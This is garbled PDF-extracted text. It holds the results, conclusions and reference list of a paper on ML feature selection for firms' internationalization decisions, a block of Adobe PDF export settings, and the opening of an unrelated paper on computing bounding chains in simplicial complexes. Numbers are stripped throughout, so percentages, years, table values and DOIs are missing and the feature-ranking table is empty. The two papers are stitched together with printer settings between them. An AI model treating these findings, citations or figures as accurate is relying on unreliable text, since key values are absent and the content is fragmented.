zaheer, schomaker & nachum, ; taras et al., ). overall, the results clearly depict a complex and multi-dimensional reality in which constructs that are frequently mentioned as determinants of internationalization (experience, distance, and diversification) are indeed complex constructs made of multiple layers that need to be disentangle and analyzed separately to fully understand the impact of each component (dow & karunaratna, ; jiménez et al., ; berry, guillén & zhou, ; pankaj, ). further, the results of the various classifiers consistently point to the critical role of the resources accumulated by the mne both in terms of employes and own experience in multiple international markets. finally, these results reinforce the utility of machine learning approaches as a complementary tool for researchers, as they permit the identification of patterns from and abductive and an inductive way that other variables employed for deductive causal inference could overlook (choudhury, allen & endres, ; choudhury et al., ). the main target of the present research has been to reduce the number of features to look for when taking internationalization decisions. it can be easily checked that this objective has been achieved when looking at the number of features comprised in the best individuals. it is worth mentioning the case of bdts, where only out of the original features (reduction of %) were selected while the misclassification rate is the second lowest. in the case of elms, it has been reduced up to , obtaining the best classification error. something similar can be said when analyzing the average number of features that is significantly lower than the number of features in the original dataset. the lowest average value ( . ) is taken when applying elms and hence for the lowest classification error. when looking at the deviation of the number of features for the best individuals in the iterations (fig. a), it can be said that the mean and the median are quite close in the case of elms results, with a significantly small deviation in the case of elms with the sinusoidal function (elm—sin). in the case of bdts, values greatly vary (from to ). regarding the average error (in red in fig b) of the whole population in the last generation, elms have obtained lower values than bdts. more precisely, the lowest value of all the iterations ( . ) has been obtained by elm—sig (identified as an outlier in the boxplot). additionally, the values obtained by elms are very compact (low standard deviation). the same can be said about the error of the best individuals (in blue in fig. b). finally, when analyzing the standard deviation of the error (in green in fig. b), it can be concluded that the highest value (identified as an outlier in the boxplot) has been obtained by the bdt while the lowest ones have been obtained by elm—sig. each one of the features in the original set has been analyzed, from an individual standpoint, for a more comprehensive study. it is shown in table the percentage of best solutions that includes each one of the original features, for the different classifiers in all the iterations. additionally, the sum of percentages has also been calculated, and features are ranked, in decreasing order according to it. herrero et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the key features (those with the highest inclusion percentage) can be selected from table . according to that, the most important features (highest accumulated inclusion rates, above ) are (in decreasing order of importance): “number of countries”, “vicarious experience same sector”, and “manufacturing”. these are also the features with a highest inclusion rate in the case of bdts and elms (sum bdt+elm in table ). more precisely, “number of countries” can be considered as the top feature as it is the one with the highest inclusion rate and was included in all the best individuals obtained by svms, bdts, and elms. from table , the least important features (lowest inclusion percentage) can be also identified. they include “psychic distance—democracy”, “population (log)”, “psychic distance—industrial development”, and “psychic distance—social system”, that have obtained the lowest accumulated inclusion rates (below ). table inclusion percentage of original features in the best individuals for all the iterations with the different classifiers. # feature name % svm rf bdt elm sum bdt+elm sum total number of countries vicarious experience same sector manufacturing employees unrelated diversification food construction related diversification roe geographic distance (log) psychic distance—education psychic distance—language regulated gdp growth stock market financial vicarious experience vicarious experience different sector fdi/gdp psychic distance—religion unemployment psychic distance—democracy population (log) psychic distance—industrial development psychic distance—social system herrero et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ these most and least important features reinforce the ideas discussed above in terms of the relevance of the resources accumulated by the firm in terms of manpower and previous experience in multiple international markets. also in line with the previous findings, vicarious experience from firms in the same sector and the specific industry to which the mne belongs to (notably in the case of manufacturing) manifest themselves as critical determinants. in contrast, other sources of vicarious experience such as the one from firms in other sectors or the combination of vicarious experience from the same and different sectors have a much less important role. as such, the results align more with those found by jiang, holburn & beamish ( ) than with jiménez & de la fuente ( ). the results also underline the fact that psychic distance do not appear as a critical determinant, and only the dimensions of education and language are moderately relevant. as in the previous case, these results therefore underline the relevance of language distance in international business (dow, cuypers & ertug, ; jimenez, holmqvist & jimenez, ), and point to the potential confounding effect of the positive and negative effects of distance in the rest of dimensions (pankaj, ; ghemawat, ; shenkar, luo & yeheskel, ; zaheer, schomaker & nachum, ; taras et al., ). these results (bdts and elms) can be compared with previous ones obtained by svms and rfs, and they are consistent. however, they are different in the case of features “employees” and “manufacturing”. the first one obtained the highest inclusion rate by combining svms and rfs while it is the fifth one when considering bdts and elms. similarly, “manufacturing” has obtained the second highest inclusion rate by combining bdts and elms. it was identified as the fifth most important one when considering svms and rfs. on the other hand, when comparing the least important features, “psychic distance—social system” and “psychic distance—industrial development” were identified by svms and rfs. “psychic distance—democracy”, “fdi/gdp”, and “unemployment” have been identified by bdts and elms. from this comparison of classifier results, it can be observed that while all the learning models emphasize the importance of firm-level determinants over country-level ones, svms and rfs find the size of the mne as measured by the number of employes to be more relevant whereas for bdts and elms it has a more modest role and, in contrast, the influences of the industry to which the mne belongs are more prevalent. regarding the least important features, all the classifiers identify country-level characteristics, such as various dimensions of psychic distance and some macroeconomic figures related to the economy international openness and the labor market. conclusions in this paper we aim to employ sophisticated ai techniques to explore the various possible configurations of variables that may play a critical impact on internationalization, in order to overcome limitations related to bounded rationality (barnard & simon, ) and provide insightful information relevant for managers and policy-makers. from the previously presented results, it can be concluded that advanced fs can be successfully applied in order to identify the most and least relevant features concerning the herrero et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ internationalization strategy of enterprises. more precisely, the elm has proved to be the wrapper learning model able to obtain the lowest error when predicting the internationalization decision on the dataset under study. the results obtained in this research clearly show that firm-level characteristics are more relevant than country-level ones. perhaps more importantly, the findings underline that constructs such as experience, product diversification or (psychic) distance are indeed complex and multi-dimensional, and that not all their components have the same importance. it is therefore necessary that future works take this complexity into consideration and researchers refrain from employing aggregated measures of these constructs and, instead, test the individual effects of each component or dimension. overall, the results in fact are consistent with previous works and with the state of the art, but also serve to provide empirical evidence that can contribute to unresolved debates in the literature (i.e., regarding the type of vicarious experience or dimension of psychic distance with the utmost importance). in this sense, we concur with recent research (choudhury et al., ; choudhury, allen & endres, ) highlighting the complementarities between machine learning techniques and other traditional tools, as the former permit identifying patterns from an abductive and an inductive way that deductive approaches such as classic regression, due to their constraints to fit models, sometimes overlook. we acknowledge that our paper is subject to some limitations, which open up interesting opportunities for further research. first, we are unable to include additional variables that could be relevant, such as the percentage of exports or the exact year the company started international operations, due to data unavailability in the data sources we were able to access on spanish mnes. besides, a transnational study is planned as future work, comprising data from additional countries. additionally, some other classifiers and combinations of them will be applied, trying to get and even lower misclassification rate. acknowledgements the work was conducted during the research stays of Álvaro herrero and roberto alcalde at kedge business school in bordeaux (france) additional information and declarations funding the authors received no funding for this work. competing interests the authors declare that they have no competing interests. author contributions � Álvaro herrero conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. herrero et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � alfredo jiménez conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � roberto alcalde conceived and designed the experiments, performed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: raw data and code are available in the supplemental files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references ambos b, leicht-deobald u, leinemann a. . understanding the formation of psychic distance perceptions: are country-level or individual-level factors more important? international business review ( ): – doi . /j.ibusrev. . . . argote l, beckman sl, epple d. . the persistence and transfer of learning in industrial settings. management science ( ): – doi . /mnsc. . . . azar g, drogendijk r. . psychic distance, innovation, and firm performance. management international review ( ): – doi . /s - - - . barkema hg, bell jh, pennings jm. . foreign entry, cultural barriers, and learning. strategic management journal : – doi . /(sici) - ( ) : < ::aid-smj > . .co; -z. barnard c, simon ha. . administrative behavior: a study of decision-making processes in administrative organization. new york: free press. berry h, guillén mf, zhou n. . an institutional approach to cross-national distance. journal of international business studies ( ): – doi . /jibs. . . bhowmick s. . how psychic distance and opportunity perceptions affect entrepreneurial firm internationalization. canadian journal of administrative sciences/revue canadienne des sciences de l’administration ( ): – doi . /cjas. . blomkvist k, drogendijk r. . the impact of psychic distance on chinese outward foreign direct investments. management international review ( ): – doi . /s - - -y. brewer p. . operationalizing psychic distance: a revised approach. journal of international marketing ( ): – doi . /jimk. . . . centre d’Études prospectives et d’informations internationales (cepii). . cepii homepage. available at http://www.cepii.fr (accessed december ). chiesa m, maioli g, colombo gi, piacentini l. . gars: genetic algorithm for the identification of a robust subset of features in high-dimensional datasets. bmc bioinformatics ( ): doi . /s - - - . chikhouni a, edwards g, farashahi m. . psychic distance and ownership in acquisitions: direction matters. journal of international management ( ): – doi . /j.intman. . . . herrero et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /j.ibusrev. . . http://dx.doi.org/ . /mnsc. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /(sici) - ( ) : % c ::aid-smj % e . .co; -z http://dx.doi.org/ . /jibs. . http://dx.doi.org/ . /cjas. http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . /jimk. . . http://www.cepii.fr http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.intman. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ choudhury p, allen rt, endres mg. . machine learning for pattern discovery in management research. strategic management journal ( ): – doi . /smj. . choudhury p, wang d, carlson na, khanna t. . machine learning approaches to facial and text analysis: discovering ceo oral communication styles. strategic management journal ( ): – doi . /smj. . chyzhyk d, savio a, graña m. . evolutionary elm wrapper feature selection for alzheimer’s disease cad on anatomical brain mri. neurocomputing (april): – doi . /j.neucom. . . . clarke je, tamaschke r, liesch pw. . international experience in international business research: a conceptualization and exploration of key themes. international journal of management reviews ( ): – doi . /j. - . . .x. clavel san emeterio m, fernández-ortiz r, arteaga-ortiz j, dorta-gonzález p. . measuring the gradualist approach to internationalization: empirical evidence from the wine sector. plos one ( ):e doi . /journal.pone. . contreras s, manzanedo mÁ, herrero Á. . a hybrid neural system to study the interplay between economic crisis and workplace accidents in spain. journal of universal computer science : – . cyert rm, march jg. . a behavioral theory of the firm. malden: blackwell. dikova d. . performance of foreign subsidiaries: does psychic distance matter? international business review ( ): – doi . /j.ibusrev. . . . dow d. . the research page for douglas dow: distance and diversity scales for international business research. available at http://dow.net.au/?page_id= (accessed december ). dow d, cuypers ir, ertug g. . the effects of within-country linguistic and religious diversity on foreign acquisitions. journal of international business studies ( ): – doi . /jibs. . . dow d, ferencikova s. . more than just national cultural distance: testing new distance scales on fdi in slovakia. international business review ( ): – doi . /j.ibusrev. . . . dow d, karunaratna a. . developing a multidimensional instrument to measure psychic distance stimuli. journal of international business studies ( ): – doi . /palgrave.jibs. . dow d, larimo j. . challenging the conceptualization and measurement of distance and international experience in entry mode choice research. journal of international marketing ( ): – doi . /jimk. . . . efron b, tibshirani rj. . an introduction to the bootstrap. boca raton: crc press. evans j, mavondo ft. . psychic distance and organizational performance: an empirical examination of international retailing operations. journal of international business studies ( ): – doi . /palgrave.jibs. . extreme learning machines. . basic elm algorithms. available at https://personal.ntu.edu.sg/ egbhuang/elm_codes.html (accessed december ). ghemawat p. . the forgotten strategy. harvard business review : – . goldberg de. . genetic algorithms in search, optimization, and machine learning. boston: addison-wesley. guillén mf. . structural inertia, imitation, and foreign expansion: south korean firms and business groups in china, – . academy of management journal : – . herrero et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /smj. http://dx.doi.org/ . /smj. http://dx.doi.org/ . /j.neucom. . . http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /j.ibusrev. . . http://dow.net.au/?page_id= http://dx.doi.org/ . /jibs. . http://dx.doi.org/ . /j.ibusrev. . . http://dx.doi.org/ . /palgrave.jibs. http://dx.doi.org/ . /jimk. . . http://dx.doi.org/ . /palgrave.jibs. https://personal.ntu.edu.sg/egbhuang/elm_codes.html https://personal.ntu.edu.sg/egbhuang/elm_codes.html http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ herrero Á, jiménez a. . improving the management of industrial and environmental enterprises by means of soft computing. cybernetics and systems ( ): – doi . / . . . herrero Á, jiménez a, bayraktar s. . hybrid unsupervised exploratory plots: a case study of analysing foreign direct investment. complexity ( ): doi . / / . hofstede g, hofstede gj, minkov m. . cultures and organizations: software of the mind. new york: mcgraw-hill. hsu m, huang c. . decision support system for management decision in high-risk business environment. journal of testing and evaluation ( ): – doi . /jte . huang g-b, zhu q-y, siew ck. . extreme learning machine: theory and applications. neurocomputing ( – ): – doi . /j.neucom. . . . huber g. . organizational learning: the contributing processes and the literatures. organization science ( ): – doi . /orsc. . . . håkanson l, ambos b, schuster a, leicht-deobald u. . the psychology of psychic distance: antecedents of asymmetric perceptions. journal of world business ( ): – doi . /j.jwb. . . . icex spain import and investments. . network of economic and commercial spanish offices abroad. available at http://www.oficinascomerciales.es (accessed december ). jadhav s, he h, jenkins k. . information gain directed genetic algorithm wrapper feature selection for credit rating. applied soft computing : – doi . /j.asoc. . . . jiang gf, holburn glf, beamish pw. . the impact of vicarious experience on foreign location strategy. journal of international management ( ): – doi . /j.intman. . . . jiang f, sui y, cao c. . an incremental decision tree algorithm based on rough sets and its application in intrusion detection. artificial intelligence review ( ): – doi . /s - - -z. jimenez a, holmqvist j, jimenez d. . cross-border communication and private participation projects: the role of genealogical language distance. management international review ( ): – doi . /s - - -y. jiménez a. . does political risk affect the scope of the expansion abroad? evidence from spanish mnes. international business review ( ): – doi . /j.ibusrev. . . . jiménez a, benito-osorio d, puck j, klopf p. . the multi-faceted role of experience dealing with policy risk: the impact of intensity and diversity of experiences. international business review ( ): – doi . /j.ibusrev. . . . jiménez a, de la fuente d. . learning from others: the impact of vicarious experience on the psychic distance and fdi relationship. management international review : – . jiménez a, herrero Á. . selecting features that drive internationalization of spanish firms. cybernetics and systems ( ): – doi . / . . . johanson j, vahlne j-e. . the internationalization process of the firm: a model of knowledge development and increasing foreign market commitments. journal of international business studies ( ): – doi . /palgrave.jibs. . johanson j, vahlne je. . the mechanism of internationalisation. international marketing review ( ): doi . / . herrero et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / . . http://dx.doi.org/ . / / http://dx.doi.org/ . /jte http://dx.doi.org/ . /j.neucom. . . http://dx.doi.org/ . /orsc. . . http://dx.doi.org/ . /j.jwb. . . http://www.oficinascomerciales.es http://dx.doi.org/ . /j.asoc. . . http://dx.doi.org/ . /j.intman. . . http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . /j.ibusrev. . . http://dx.doi.org/ . /j.ibusrev. . . http://dx.doi.org/ . / . . http://dx.doi.org/ . /palgrave.jibs. http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ johanson j, vahlne j-e. . the uppsala internationalization process model revisited: from liability of foreignness to liability of outsidership. journal of international business studies ( ): – doi . /jibs. . . johanson j, wiedersheim-paul f. . the internationalization of the firm: four swedish cases. journal of management studies ( ): – doi . /j. - . .tb .x. john gh, kohavi r, pfleger k. . irrelevant features and the subset selection problem. in: th international conference on machine learning, morgan kauffman, – . klein s, roth vj. . determinants of export channel structure: the effects of experience and psychic distance reconsidered. international marketing review ( ): – . kleinert j, toubal f. . gravity for fdi. review of international economics ( ): – doi . /j. - . . .x. kogut b, singh h. . the effect of national culture on the choice of entry mode. journal of international business studies ( ): – doi . /palgrave.jibs. . kohavi r, john gh. . wrappers for feature subset selection. artificial intelligence ( – ): – doi . /s - ( ) -x. kramer o. . genetic algorithm essentials. cham: springer international publishing. kumar ms. . the relationship between product and international diversification: the effects of short-run constraints and endogeneity. strategic management journal ( ): – doi . /smj. . levitt b, march jg. . organizational learning. annual review of sociology ( ): – doi . /annurev.so. . . . lieberman mb, asaba s. . why do firms imitate each other? academy of management review : – . magnani g, zucchella a, floriani de. . the logic behind foreign market selection: objective distance dimensions vs. strategic objectives and psychic distance. international business review ( ): – doi . /j.ibusrev. . . . magnusson p, schuster a, taras v. . a process-based explanation of the psychic distance paradox: evidence from global virtual teams. management international review ( ): – doi . /s - - - . maleki n, zeinali y, niaki sta. . a k-nn method for lung cancer prognosis with the use of a genetic algorithm for feature selection. expert systems with applications ( ): doi . /j.eswa. . . meng-yao z, rui-hua y, su-fang z, jun-hai z. . feature selection based on extreme learning machine. in: international conference on machine learning and cybernetics, – . meyer ke, nguyen hv. . foreign investment strategies and sub-national institutions in emerging markets: evidence from vietnam. journal of management studies ( ): – doi . /j. - . . .x. nachum l, zaheer s, gross s. . does it matter where countries are? proximity to knowledge, markets and resources, and mne location choices. management science ( ): – doi . /mnsc. . . nordman er, tolstoy d. . does relationship psychic distance matter for the learning processes of internationalizing smes? international business review ( ): – doi . /j.ibusrev. . . . nordstrom ka, vahlne je. . the internationalization process of the firm: searching for new patterns and explanations. stockholm: institute of international business. herrero et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /jibs. . http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /palgrave.jibs. http://dx.doi.org/ . /s - ( ) -x http://dx.doi.org/ . /smj. http://dx.doi.org/ . /annurev.so. . . http://dx.doi.org/ . /j.ibusrev. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.eswa. . http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /mnsc. . http://dx.doi.org/ . /j.ibusrev. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ojala a, tyrväinen p. . impact of psychic distance to the internationalization behavior of knowledge-intensive smes. european business review ( ): – doi . / . o’grady s, lane hw. . the psychic distance paradox. journal of international business studies ( ): – doi . /palgrave.jibs. . padmanabhan p, cho kr. . decision specific experience in foreign ownership and establishment strategies: evidence from japanese firms. journal of international business studies ( ): – doi . /palgrave.jibs. . pankaj g. . distance still matters: the hard reality of global expansion. harvard business review : – . panthong r, srivihok a. . wrapper feature subset selection for dimension reduction based on ensemble learning algorithm. procedia computer science : – doi . /j.procs. . . . puthusserry pn, child j, rodrigues sb. . psychic distance, its business impact and modes of coping: a study of british and indian partner smes. management international review ( ): – doi . /s - - - . ramanujam v, varadarajan p. . research on corporate diversification: a synthesis. strategic management journal ( ): – doi . /smj. . rustam z, yaurita f, segovia-vergas mj. . application of support vector machines in evaluating the internationalization success of companies. journal of physics: conference series : doi . / - / / / . saad a. . an overview of hybrid soft computing techniques for classifier design and feature selection. in: eighth international conference on hybrid intelligent systems, – . safavian sr, landgrebe d. . a survey of decision tree classifier methodology. ieee transactions on systems, man and cybernetics ( ): – doi . / . . salcedo-sanz s, camps-valls g, perez-cruz f, sepulveda-sanchis j, bousono-calzon c. . enhancing genetic feature selection through restricted search and walsh analysis. ieee transactions on systems, man, and cybernetics, part c ( ): – doi . /tsmcc. . . shenkar o, luo y, yeheskel o. . from “distance” to “friction”: substituting metaphors and redirecting intercultural research. academy of management review ( ): – doi . /amr. . . siedlecki w, sklansky j. . a note on genetic algorithms for large-scale feature selection. pattern recognition letters ( ): – doi . / - ( ) - . simić d, svirčević v, ilin v, simić sd, simić s. . particle swarm optimization and pure adaptive search in finish goods’ inventory management. cybernetics and systems ( ): – doi . / . . . sreerama km. . automatic construction of decision trees from data: a multi-disciplinary survey. data mining and knowledge discovery ( ): – doi . /a: . taras v, baack d, caprar d, dow d, froese f, jimenez a, magnusson p. . diverse effects of diversity: disaggregating effects of diversity in global virtual teams. journal of international management ( ): doi . /j.intman. . . terlaak a, gong y. . vicarious learning and inferential accuracy in adoption processes. academy of management review ( ): – doi . /amr. . . herrero et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / http://dx.doi.org/ . /palgrave.jibs. http://dx.doi.org/ . /palgrave.jibs. http://dx.doi.org/ . /j.procs. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /smj. http://dx.doi.org/ . / - / / / http://dx.doi.org/ . / . http://dx.doi.org/ . /tsmcc. . http://dx.doi.org/ . /amr. . http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . / . . http://dx.doi.org/ . /a: http://dx.doi.org/ . /j.intman. . http://dx.doi.org/ . /amr. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ termenon m, graña m, barrós-loscertales a, Ávila c. . extreme learning machines for feature selection and classification of cocaine dependent patients on structural mri data. neural processing letters ( ): – doi . /s - - -x. tinbergen j, hekscher a. . shaping the world economy: suggestions for an international economic policy. new york: twentieth century fund. tung rl, verbeke a. . beyond hofstede and globe: improving the quality of cross-cultural research. journal of international business studies ( ): – doi . /jibs. . . vahlne j-e. . the uppsala model on evolution of the multinational business enterprise—from internalization to coordination of networks. international marketing review ( ): – doi . / . vahlne j-e, bhatti wa. . relationship development: a micro-foundation for the internationalization process of the multinational business enterprise. management international review ( ): – doi . /s - - -z. vahlne j-e, johanson j. . from internationalization to evolution: the uppsala model at years. journal of international business studies ( ): – doi . /s - - - . vahlne j-e, nordström ka. . is the globe shrinking? psychic distance and the establishment of swedish sales subsidiaries during the last years. stockholm: institute of international business. wang y-y, zhang h, qiu c-h, xia s-r. . a novel feature selection method based on extreme learning machine and fractional-order darwinian pso. computational intelligence and neuroscience : – doi . / / . xue x, yao m, wu z. . a novel ensemble-based wrapper method for feature selection using extreme learning machine and genetic algorithm. knowledge and information systems ( ): – doi . /s - - - . yildiz he, fey cf. . are the extent and effect of psychic distance perceptions symmetrical in cross-border m&as? evidence from a two-country study. journal of international business studies ( ): – doi . /jibs. . . zaheer s, schomaker ms, nachum l. . distance without direction: restoring credibility to a much-loved construct. journal of international business studies ( ): – doi . /jibs. . . herrero et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /jibs. . http://dx.doi.org/ . / http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /jibs. . http://dx.doi.org/ . /jibs. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ advanced feature selection to study the internationalization strategy of enterprises introduction literature review materials and methods results and discussion conclusions flink references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice submitted august accepted april published may corresponding author j. frederico carvalho, jfpbdc@kth.se academic editor mark wilson additional information and declarations can be found on page doi . /peerj-cs. copyright carvalho et al. distributed under creative commons cc-by . open access an algorithm for calculating top- dimensional bounding chains j. frederico carvalho , mikael vejdemo-johansson , danica kragic and florian t. pokorny cas/rpl, kth, royal institute of technology, stockholm, sweden mathematics department, city university of new york, college of staten island, new york, ny, united states of america abstract we describe the coefficient-flow algorithm for calculating the bounding chain of an (n− )-boundary on an n-manifold-like simplicial complex s. we prove its correctness and show that it has a computational time complexity of o(|s(n− )|) (where s(n− ) is the set of (n− )-faces of s). we estimate the big-o coefficient which depends on the dimension of s and the implementation. we present an implementation, experimentally evaluate the complexity of our algorithm, and compare its performance with that of solving the underlying linear system. subjects algorithms and analysis of algorithms, data science, scientific computing and simulation keywords homology, computational algebraic topology introduction topological spaces are by and large characterized by the cycles in them (i.e., closed paths and their higher dimensional analogues) and the ways in which they can or cannot be deformed into each other. this idea had been recognized by poincaré from the beginning of the study of topology. consequently much of the study of topological spaces has been dedicated to understanding cycles, and these are the key features studied by the topological data analysis community (edelsbrunner & harer, ). one key part of topological data analysis methods is to distinguish between different cycles; more precisely, to characterize different cycles according to their homology class. this can be done efficiently using cohomology (pokorny, hawasly & ramamoorthy, ; edelsbrunner, letscher & zomorodian, ). however, such methods only distinguish between non-homologous cycles, and do not quantify the difference between cycles. a possible way to quantify this difference is to solve the problem of finding the chain whose boundary is the union of the two cycles in question, as was proposed in chambers & vejdemo-johansson ( ) by solving the underlying linear system, where the authors also take the question of optimality into account (with regards to the size of the resulting chain). this line of research ellaborates on dey, hirani & krishnamoorthy ( ) where the authors considered the problem of finding an optimal chain in the same homology class as a given chain. more 